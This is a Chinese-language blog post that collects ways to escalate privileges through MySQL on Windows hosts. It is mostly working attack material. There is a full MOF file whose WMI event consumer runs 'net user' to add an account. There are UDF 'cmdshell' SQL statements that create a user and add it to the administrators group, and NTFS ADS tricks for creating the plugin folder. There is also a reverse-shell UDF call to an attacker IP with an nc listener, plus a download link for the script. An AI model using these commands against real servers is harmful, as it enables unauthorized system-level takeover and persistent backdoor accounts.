mysql 提权_MYSQL提权总结
经擦遇到了MYSQL数据库,想尽办法提权,最终都没有成功,很是郁闷,可能是自己很久没有研究过提权导致的吧,总结一下MYSQL提权的各种姿势吧,权当复习了。关于mysql提权的方法也就那么几种,希望也能帮到各位小伙伴们。
一、利用mof提权
前段时间国外Kingcope大牛发布了mysql远程提权0day(MySQL Windows
Remote System Level Exploit (Stuxnet technique)
0day),剑心牛对MOF利用进行了分析,如下:
Windows
管理规范 (WMI) 提供了以下三种方法编译到 WMI
存储库的托管对象格式 (MOF) 文件:
方法 1: 运行 MOF 文件指定为命令行参数将
Mofcomp.exe 文件。
方法 2: 使用 IMofCompiler
接口和 $ CompileFile 方法。
方法
3: 拖放到 %SystemRoot%\System32\Wbem\MOF
文件夹的 MOF 文件。
Microsoft 建议您到存储库编译 MOF
文件使用前两种方法。也就是运行 Mofcomp.exe 文件,或使用 IMofCompiler::CompileFile
方法。
第三种方法仅为向后兼容性与早期版本的 WMI
提供,并因为此功能可能不会提供在将来的版本后,不应使用。
具体到mysql提权中,我们又该怎么利用呢?
1、找一个可写目录上传mof文件,我这里上传到了 C:/wmpub/nullevt.mof
代码如下。
#pragma
namespace("\\\\.\\root\\subscription")
instance of __EventFilter as
$EventFilter
{
EventNamespace
= "Root\\Cimv2";
Name
= "filtP2";
Query = "Select * From
__InstanceModificationEvent "
"Where
TargetInstance Isa
\"Win32_LocalTime\" "
"And
TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as
$Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var
WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user
waitalone waitalone.cn /add\")";
};
instance of
__FilterToConsumerBinding
{
Consumer
= $Consumer;
Filter = $EventFilter;
};
其中的第18行的命令,上传前请自己更改。
2、执行load_file及into
dumpfile把文件导出到正确的位置即可。
select load_file('C:/wmpub/nullevt.mof') into
dumpfile
'c:/windows/system32/wbem/mof/nullevt.mof'
执行成功后,即可添加一个普通用户,然后你可以更改命令,再上传导出执行把用户提升到管理员权限,然后3389连接之就ok了。
二、利用UDF提权
udf提权这是最常见的提权方式了,但是往往在执行过程中老是遇到"Can't open shared
library"的情况,这里我们可以利用NTFS ADS流来解决这个问题。
1、最常见的是直接使用udf.php此类的工具来执行udf提权,具体如下。
连接到mysql以后,先导出udf.dll到c:\windows\system32目录下。
2、创建相应的函数并执行命令,具体如下:
create function cmdshell returns string soname
'udf.dll';
select cmdshell('net user waitalone waitalone.cn
/add');
select cmdshell('net localgroup administrators
waitalone /add');
drop function
cmdshell; 删除函数
delete from mysql.func where
name='cmdshell' 删除函数
3、某些情况下,我们会遇到Can't open shared
library的情况,这时就需要我们把udf.dll导出到lib\plugin目录下才可以,但是默认情况下plugin不存在,怎么办? 还好有大牛研究出了利用NTFS
ADS流来创建文件夹的方法
select
@@basedir;
//查找到mysql的目录
select 'It is dll' into dumpfile
'C:\\Program Files\\MySQL\\MySQL Server
5.1\\lib::$INDEX_ALLOCATION';
//利用NTFS ADS创建lib目录
select 'It is dll' into dumpfile 'C:\\Program
Files\\MySQL\\MySQL Server
5.1\\lib\\plugin::$INDEX_ALLOCATION';
//利用NTFS ADS创建plugin目录
执行成功以后再进行导出即可。
三、反弹端口连接提权
假如我们扫到了一个mysql的root弱密码,并且可以外连,但是服务器上面的网站又无法Getshell,这时我们怎么办呢?
1、利用mysql客户端工具连接mysql服务器,然后执行下面的操作。
mysql.exe -h 172.16.10.11
-uroot -p
Enter password:
mysql> \.
c:\mysql.txt
mysql>select
backshell("YourIP",2010);
2、本地监听你反弹的端口
nc.exe -vv -l -p
2010
成功后,你将获得一个system权限的cmdshell,其实这个也是利用的UDF提权。
mysql.txt下载
:http://pan.baidu.com/share/link?shareid=3689997446&uk=2466540631
参考文章:
http://zone.wooyun.org/content/1795
http://www.exploit-db.com/exploits/23083/
http://www.myhack58.com/Article/html/3/8/2013/38264.htm
http://www.2cto.com/Article/201212/177983.html
要是执行 创建shell出现以下回显 很大的可能是被删了
SQL语句:create function cmdshell returns string
soname 'moonudf.dll'
Can't open shared library
'moonudf.dll' (errno: 2 )
另外要是不存在plugin目录可以用ADS创建
//查找mysql的目录select
@@basedir;//利用NTFS ADS创建lib目录select 'It is dll'into dumpfile
'C:\\Program Files\\MySQL\\MySQL Server
5.1\\lib::$INDEX_ALLOCATION';//利用NTFS ADS创建plugin目录select 'It is
dll'into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server
5.1\\lib\\plugin::$INDEX_ALLOCATION';
另外再附一篇文章 ,说的听明白
udf提权方法和出现问题汇总
一、适用条件
1.目标系统是Windows(Win2000,XP,Win2003);
2.你已经拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete权限以创建和抛弃函数(MYSQL文档原语)。
3.有root账号密码
二、导出udf
MYSQL 5.1以下版本导出路径:
C:Winntudf.dll
2000C:Windowsudf.dll
2003(有的系统被转义,需要改为C:Windowsudf.dll)
导出DLL文件,导出时请勿必注意导出路径(一般情况下对任何目录可写,无需考虑权限问题)
MYSQL
5.1以上版本,必须要把udf.dll文件放到MYSQL安装目录下的libplugin文件夹下才能创建自定义函数
可以再mysql里输入
select @@basedir
show variables like
'%plugins%' 寻找mysql安装路径
该目录默认是不存在的,这就需要我们使用webshell找到MYSQL的安装目录,并在安装目录下创建libplugin文件夹,然后将udf.dll文件导出到该目录即可。
三、提权
使用SQL语句创建功能函数。语法:Create Function
函数名(函数名只能为下面列表中的其中之一)returns string soname
'导出的DLL路径';
create function cmdshell returns string soname
'udf.dll'select cmdshell('net user arsch arsch /add');select
cmdshell('net localgroup administrators arsch
/add');
drop function cmdshell;
总结:
mysql中支持UDF扩展 ,使得我们可以调用DLL里面的函数来实现一些特殊的功能。但是对于UDF的具体限制,MYSQL的各个版本各有不同。 下面记录一下:
在MYSQL
4.1以前的版本中,可以将所有的DLL文件里面的任何函数都注册到MYSQL里面以供MYSQL调用。无论这个DLL在什么位置,函数的声明是什么样的。
在MYSQL
4.1及以后的版本中,对UDF函数进行了限制,只有实现了一个特定接口的函数才可以被成功注册到MYSQL中,这样就防止了通过MYSQL非法调用系统的DLL。
在MYSQL5.0以后,对注册的DLL的位置有了限制,创建函数的时候,所对应的DLL不能包含/或者,简单的理解就是不能是绝对路径。所以我们将DLL释放到system32目录,来跳过这个限制..或者放到盘符的根目录下通过c:udf.dll这种形式的写法来跳过限制。
后来发现原来只要把dll放到PATH这个环境变量所表示的任何一个目录下面,效果跟放到system32目录下面一样。
再说MYSQL5.1,这里有个问题相信大家会经常遇到的。。大家有的时候在创建函数的时候,常常会遇到:数据库查讯出错,请检查SQL语句create
function cmdshell returns string soname
'udf.dll'的语法是否正确。Function 'cmdshell'already
exists
(文章来自百度)